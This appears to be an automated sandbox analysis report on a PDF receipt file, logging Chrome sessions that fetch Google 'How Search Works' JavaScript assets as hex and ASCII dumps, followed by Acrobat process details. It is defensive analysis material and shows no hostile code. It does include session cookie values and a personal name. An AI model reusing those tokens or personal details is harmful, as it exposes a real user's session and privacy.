                                                                                                                                                                                                                                                                                          Data Ascii: class l{constructor(){this.callbacks=[],this.activeBreakpoints=[],this.scheduled=!1,this.queries=[{name:"desktop",query:window&&window.matchMedia("(min-width: 1440px)")},{name:"laptop-gt",query:window&&window.matchMedia("(min-width: 1024px)")},{name:"tabl
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:23 UTC1223INData Raw: 65 3a 22 6d 6f 62 69 6c 65 22 2c 71 75 65 72 79 3a 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 61 74 63 68 4d 65 64 69 61 28 22 28 6d 61 78 2d 77 69 64 74 68 3a 20 37 36 38 70 78 29 22 29 7d 5d 3b 66 6f 72 28 63 6f 6e 73 74 20 74 20 6f 66 20 74 68 69 73 2e 71 75 65 72 69 65 73 29 74 2e 71 75 65 72 79 2e 6d 61 74 63 68 65 73 26 26 74 68 69 73 2e 75 70 64 61 74 65 42 72 65 61 6b 70 6f 69 6e 74 53 74 61 74 75 73 28 74 29 2c 74 2e 71 75 65 72 79 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 68 61 6e 67 65 22 2c 28 29 3d 3e 7b 74 68 69 73 2e 68 61 6e 64 6c 65 43 68 61 6e 67 65 28 74 29 7d 29 3b 74 68 69 73 2e 73 63 68 65 64 75 6c 65 55 70 64 61 74 65 28 29 7d 73 75 62 73 63 72 69 62 65 28 74 29 7b 74 68 69 73 2e 63 61 6c 6c 62 61 63 6b 73 2e
                                                                                                                                                                                                                                                                                          Data Ascii: e:"mobile",query:window&&window.matchMedia("(max-width: 768px)")}];for(const t of this.queries)t.query.matches&&this.updateBreakpointStatus(t),t.query.addEventListener("change",()=>{this.handleChange(t)});this.scheduleUpdate()}subscribe(t){this.callbacks.


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          147192.168.2.750111142.250.186.1324435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:23 UTC782OUTGET /search/howsearchworks/assets/vjYgswK-.min.js HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:23 UTC859INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          Content-Type: text/javascript
                                                                                                                                                                                                                                                                                          Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/uxe-owners-acl/www_google
                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="uxe-owners-acl/www_google"
                                                                                                                                                                                                                                                                                          Report-To: {"group":"uxe-owners-acl/www_google","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/uxe-owners-acl/www_google"}]}
                                                                                                                                                                                                                                                                                          Content-Length: 1576
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:42:23 GMT
                                                                                                                                                                                                                                                                                          Expires: Fri, 27 Sep 2024 14:42:23 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: private, max-age=3000
                                                                                                                                                                                                                                                                                          Last-Modified: Fri, 08 Mar 2024 16:00:00 GMT
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                          Server: sffe
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:23 UTC531INData Raw: 69 6d 70 6f 72 74 7b 73 20 61 73 20 6c 7d 66 72 6f 6d 22 2e 2f 79 63 61 47 34 59 58 70 2e 6d 69 6e 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 65 20 61 73 20 66 7d 66 72 6f 6d 22 2e 2f 30 58 50 77 54 46 63 67 2e 6d 69 6e 2e 6a 73 22 3b 66 75 6e 63 74 69 6f 6e 20 68 28 6e 29 7b 6c 65 74 20 65 3d 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 2e 73 70 6c 69 74 28 6e 2b 22 3d 22 29 5b 31 5d 3b 72 65 74 75 72 6e 20 65 3d 65 26 26 65 2e 73 70 6c 69 74 28 22 26 22 29 5b 30 5d 2c 65 7c 7c 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 64 28 6e 29 7b 63 6f 6e 73 74 20 65 3d 6e 2e 73 75 62 73 74 72 28 31 29 2c 72 3d 7b 7d 3b 72 65 74 75 72 6e 20 65 2e 73 70 6c 69 74 28 22 26 22 29 2e 66 6f 72 45 61 63 68 28 61 3d 3e 7b 63 6f 6e 73 74 20 74 3d 61 2e 73 70 6c
                                                                                                                                                                                                                                                                                          Data Ascii: import{s as l}from"./ycaG4YXp.min.js";import{e as f}from"./0XPwTFcg.min.js";function h(n){let e=window.location.search.split(n+"=")[1];return e=e&&e.split("&")[0],e||null}function d(n){const e=n.substr(1),r={};return e.split("&").forEach(a=>{const t=a.spl
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:23 UTC1045INData Raw: 73 28 74 29 29 7c 7c 74 29 3b 72 65 74 75 72 6e 20 61 26 26 74 26 26 6d 28 65 2c 72 2c 74 29 2c 74 7d 3b 6c 65 74 20 70 3d 63 6c 61 73 73 20 65 78 74 65 6e 64 73 20 6c 7b 63 6f 6e 6e 65 63 74 65 64 43 61 6c 6c 62 61 63 6b 28 29 7b 73 75 70 65 72 2e 63 6f 6e 6e 65 63 74 65 64 43 61 6c 6c 62 61 63 6b 28 29 3b 63 6f 6e 73 74 20 65 3d 68 28 22 76 65 72 73 69 6f 6e 22 29 3d 3d 3d 22 32 22 3f 22 61 70 70 72 6f 61 63 68 2d 66 65 61 74 75 72 65 2d 63 61 72 64 73 22 3a 22 61 70 70 72 6f 61 63 68 2d 35 30 35 30 22 2c 72 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 72 26 26 28 72 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 6e 6f 6e 65 22 29 7d 61 73 79 6e 63 20 66 69 72 73 74 55 70 64 61 74 65 64 28 29 7b 61 77 61 69 74 20
                                                                                                                                                                                                                                                                                          Data Ascii: s(t))||t);return a&&t&&m(e,r,t),t};let p=class extends l{connectedCallback(){super.connectedCallback();const e=h("version")==="2"?"approach-feature-cards":"approach-5050",r=document.getElementById(e);r&&(r.style.display="none")}async firstUpdated(){await


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          148192.168.2.750112142.250.181.2284435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:23 UTC1382OUTGET /search/howsearchworks/assets/lHimDk5Y.min.js HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          Origin: https://www.google.com
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                                                                          sec-ch-ua-full-version: "117.0.5938.134"
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                                                                          sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                                                                                                                                                                                                                                                          sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                                                                          sec-ch-ua-model: ""
                                                                                                                                                                                                                                                                                          sec-ch-prefers-color-scheme: light
                                                                                                                                                                                                                                                                                          sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                          Referer: https://www.google.com/search/howsearchworks/?fg=1
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:23 UTC859INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          Content-Type: text/javascript
                                                                                                                                                                                                                                                                                          Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/uxe-owners-acl/www_google
                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="uxe-owners-acl/www_google"
                                                                                                                                                                                                                                                                                          Report-To: {"group":"uxe-owners-acl/www_google","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/uxe-owners-acl/www_google"}]}
                                                                                                                                                                                                                                                                                          Content-Length: 5361
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:42:23 GMT
                                                                                                                                                                                                                                                                                          Expires: Fri, 27 Sep 2024 14:42:23 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: private, max-age=3000
                                                                                                                                                                                                                                                                                          Last-Modified: Thu, 28 Mar 2024 02:30:00 GMT
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                          Server: sffe
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:23 UTC531INData Raw: 69 6d 70 6f 72 74 7b 78 20 61 73 20 65 7d 66 72 6f 6d 22 2e 2f 79 63 61 47 34 59 58 70 2e 6d 69 6e 2e 6a 73 22 3b 66 75 6e 63 74 69 6f 6e 20 69 28 74 29 7b 73 77 69 74 63 68 28 74 29 7b 63 61 73 65 22 66 69 6c 65 22 3a 72 65 74 75 72 6e 20 65 60 0a 20 20 20 20 20 20 20 20 3c 73 76 67 0a 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 32 30 22 0a 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 31 22 0a 20 20 20 20 20 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 30 20 32 31 22 0a 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 0a 20 20 20 20 20 20 20 20 3e 0a 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                          Data Ascii: import{x as e}from"./ycaG4YXp.min.js";function i(t){switch(t){case"file":return e` <svg width="20" height="21" viewBox="0 0 20 21" fill="none" xmlns="http://www.w3.org/2000/svg" >
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:23 UTC1390INData Raw: 31 20 31 32 2e 30 37 32 36 20 31 2e 34 32 31 38 35 43 31 32 2e 32 33 32 33 20 31 2e 34 39 31 33 20 31 32 2e 33 36 37 37 20 31 2e 35 38 31 35 38 20 31 32 2e 34 37 38 38 20 31 2e 36 39 32 36 39 4c 31 36 2e 32 39 31 33 20 35 2e 35 30 35 31 39 43 31 36 2e 34 30 32 35 20 35 2e 36 31 36 33 20 31 36 2e 34 39 32 37 20 35 2e 37 35 31 37 32 20 31 36 2e 35 36 32 32 20 35 2e 39 31 31 34 34 43 31 36 2e 36 33 31 36 20 36 2e 30 37 31 31 36 20 31 36 2e 36 36 36 33 20 36 2e 32 33 34 33 35 20 31 36 2e 36 36 36 33 20 36 2e 34 30 31 30 32 56 31 36 2e 37 33 34 34 43 31 36 2e 36 36 36 33 20 31 37 2e 30 36 37 37 20 31 36 2e 35 34 31 33 20 31 37 2e 33 35 39 34 20 31 36 2e 32 39 31 33 20 31 37 2e 36 30 39 34 43 31 36 2e 30 34 31 33 20 31 37 2e 38 35 39 34 20 31 35 2e 37 34 39 37
                                                                                                                                                                                                                                                                                          Data Ascii: 1 12.0726 1.42185C12.2323 1.4913 12.3677 1.58158 12.4788 1.69269L16.2913 5.50519C16.4025 5.6163 16.4927 5.75172 16.5622 5.91144C16.6316 6.07116 16.6663 6.23435 16.6663 6.40102V16.7344C16.6663 17.0677 16.5413 17.3594 16.2913 17.6094C16.0413 17.8594 15.7497
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:23 UTC1390INData Raw: 20 20 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 33 20 32 30 22 0a 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 0a 20 20 20 20 20 20 20 20 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 31 2e 35 35 32 31 20 31 4c 32 20 31 30 2e 36 34 33 36 4c 31 32 20 31 39 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 74 72 6f 6b 65 3d 22 23 32 30 32 31 32 34 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 3e 3c 2f 70 61 74 68 3e 0a 20 20 20 20 20 20 20 20 3c 2f 73 76 67 3e 0a
                                                                                                                                                                                                                                                                                          Data Ascii: viewBox="0 0 13 20" fill="none" xmlns="http://www.w3.org/2000/svg" > <path d="M11.5521 1L2 10.6436L12 19" stroke="#202124" stroke-width="2" ></path> </svg>
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:23 UTC1390INData Raw: 20 20 20 60 3b 63 61 73 65 22 70 6c 61 79 5f 63 69 72 63 6c 65 5f 66 69 6c 6c 65 64 22 3a 72 65 74 75 72 6e 20 65 60 3c 73 76 67 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 39 22 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 39 22 0a 20 20 20 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 39 20 31 39 22 0a 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 0a 20 20 20 20 20 20 3e 0a 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 0a 20 20 20 20 20 20 20 20 20 20 63 6c 69 70 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22
                                                                                                                                                                                                                                                                                          Data Ascii: `;case"play_circle_filled":return e`<svg width="19" height="19" viewBox="0 0 19 19" fill="none" xmlns="http://www.w3.org/2000/svg" > <path fill-rule="evenodd" clip-rule="evenodd"
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:23 UTC660INData Raw: 36 37 20 39 2e 35 32 35 20 31 30 2e 35 20 38 2e 38 33 33 33 33 20 31 30 2e 35 48 36 2e 37 35 56 35 2e 35 48 38 2e 38 33 33 33 33 43 39 2e 35 32 35 20 35 2e 35 20 31 30 2e 30 38 33 33 20 36 2e 30 35 38 33 33 20 31 30 2e 30 38 33 33 20 36 2e 37 35 56 39 2e 32 35 5a 4d 31 34 2e 32 35 20 36 2e 37 35 48 31 32 2e 31 36 36 37 56 37 2e 35 38 33 33 33 48 31 33 2e 34 31 36 37 56 38 2e 38 33 33 33 33 48 31 32 2e 31 36 36 37 56 31 30 2e 35 48 31 30 2e 39 31 36 37 56 35 2e 35 48 31 34 2e 32 35 56 36 2e 37 35 5a 4d 35 2e 39 31 36 36 37 20 37 2e 35 38 33 33 33 43 35 2e 39 31 36 36 37 20 38 2e 32 37 35 20 35 2e 33 35 38 33 33 20 38 2e 38 33 33 33 33 20 34 2e 36 36 36 36 37 20 38 2e 38 33 33 33 33 48 33 2e 38 33 33 33 33 56 31 30 2e 35 48 32 2e 35 38 33 33 33 56 35 2e 35
                                                                                                                                                                                                                                                                                          Data Ascii: 67 9.525 10.5 8.83333 10.5H6.75V5.5H8.83333C9.525 5.5 10.0833 6.05833 10.0833 6.75V9.25ZM14.25 6.75H12.1667V7.58333H13.4167V8.83333H12.1667V10.5H10.9167V5.5H14.25V6.75ZM5.91667 7.58333C5.91667 8.275 5.35833 8.83333 4.66667 8.83333H3.83333V10.5H2.58333V5.5


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          149192.168.2.750113142.250.186.1324435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:23 UTC782OUTGET /search/howsearchworks/assets/v6TSeaUt.min.js HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:23 UTC858INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          Content-Type: text/javascript
                                                                                                                                                                                                                                                                                          Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/uxe-owners-acl/www_google
                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="uxe-owners-acl/www_google"
                                                                                                                                                                                                                                                                                          Report-To: {"group":"uxe-owners-acl/www_google","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/uxe-owners-acl/www_google"}]}
                                                                                                                                                                                                                                                                                          Content-Length: 909
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:42:23 GMT
                                                                                                                                                                                                                                                                                          Expires: Fri, 27 Sep 2024 14:42:23 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: private, max-age=3000
                                                                                                                                                                                                                                                                                          Last-Modified: Wed, 29 May 2024 21:30:00 GMT
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                          Server: sffe
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:23 UTC532INData Raw: 69 6d 70 6f 72 74 7b 69 20 61 73 20 70 2c 73 20 61 73 20 75 2c 78 20 61 73 20 62 7d 66 72 6f 6d 22 2e 2f 79 63 61 47 34 59 58 70 2e 6d 69 6e 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 65 20 61 73 20 6d 7d 66 72 6f 6d 22 2e 2f 30 58 50 77 54 46 63 67 2e 6d 69 6e 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 65 20 61 73 20 67 7d 66 72 6f 6d 22 2e 2f 70 39 6b 63 50 71 39 31 2e 6d 69 6e 2e 6a 73 22 3b 76 61 72 20 68 3d 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 2c 63 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 2c 61 3d 28 6e 2c 74 2c 73 2c 6f 29 3d 3e 7b 66 6f 72 28 76 61 72 20 65 3d 6f 3e 31 3f 76 6f 69 64 20 30 3a 6f 3f 63 28 74 2c 73 29 3a 74 2c 6c 3d 6e 2e 6c 65 6e 67 74 68 2d 31 2c 69 3b 6c 3e 3d 30
                                                                                                                                                                                                                                                                                          Data Ascii: import{i as p,s as u,x as b}from"./ycaG4YXp.min.js";import{e as m}from"./0XPwTFcg.min.js";import{e as g}from"./p9kcPq91.min.js";var h=Object.defineProperty,c=Object.getOwnPropertyDescriptor,a=(n,t,s,o)=>{for(var e=o>1?void 0:o?c(t,s):t,l=n.length-1,i;l>=0
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:23 UTC377INData Raw: 20 20 20 20 20 20 6c 61 62 65 6c 3d 22 54 6f 67 67 6c 65 20 6d 65 6e 75 22 0a 20 20 20 20 20 20 20 20 40 63 6c 69 63 6b 3d 24 7b 28 29 3d 3e 74 68 69 73 2e 74 6f 67 67 6c 65 28 29 7d 0a 20 20 20 20 20 20 20 20 74 72 61 6e 73 70 61 72 65 6e 74 0a 20 20 20 20 20 20 3e 3c 2f 68 73 77 2d 62 75 74 74 6f 6e 3e 0a 20 20 20 20 60 7d 7d 3b 72 2e 73 74 79 6c 65 73 3d 70 60 0a 20 20 20 20 68 73 77 2d 62 75 74 74 6f 6e 20 7b 0a 20 20 20 20 20 20 2d 2d 68 73 77 2d 62 75 74 74 6f 6e 2d 63 6f 6c 6f 72 3a 20 23 35 66 36 33 36 38 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 73 77 2d 62 75 74 74 6f 6e 3a 3a 70 61 72 74 28 62 75 74 74 6f 6e 29 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 20 2d 31 32 70 78 3b 0a 20 20 20 20 20 20 68 65
                                                                                                                                                                                                                                                                                          Data Ascii: label="Toggle menu" @click=${()=>this.toggle()} transparent ></hsw-button> `}};r.styles=p` hsw-button { --hsw-button-color: #5f6368; } hsw-button::part(button) { margin-inline-start: -12px; he


                                                                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                                                                                                                          Start time:10:40:20
                                                                                                                                                                                                                                                                                          Start date:27/09/2024
                                                                                                                                                                                                                                                                                          Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Electronic Receipt for Carolann Campbell.pdf"
                                                                                                                                                                                                                                                                                          Imagebase:0x7ff702560000
                                                                                                                                                                                                                                                                                          File size:5'641'176 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                          Target ID:2
                                                                                                                                                                                                                                                                                          Start time:10:40:21
                                                                                                                                                                                                                                                                                          Start date:27/09/2024
                                                                                                                                                                                                                                                                                          Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                                                                                                                                                                                                                                          Imagebase:0x7ff6c3ff0000
                                                                                                                                                                                                                                                                                          File size:3'581'912 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                          Target ID:4
                                                                                                                                                                                                                                                                                          Start time:10:40:21
                                                                                                                                                                                                                                                                                          Start date:27/09/2024
                                                                                                                                                                                                                                                                                          Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
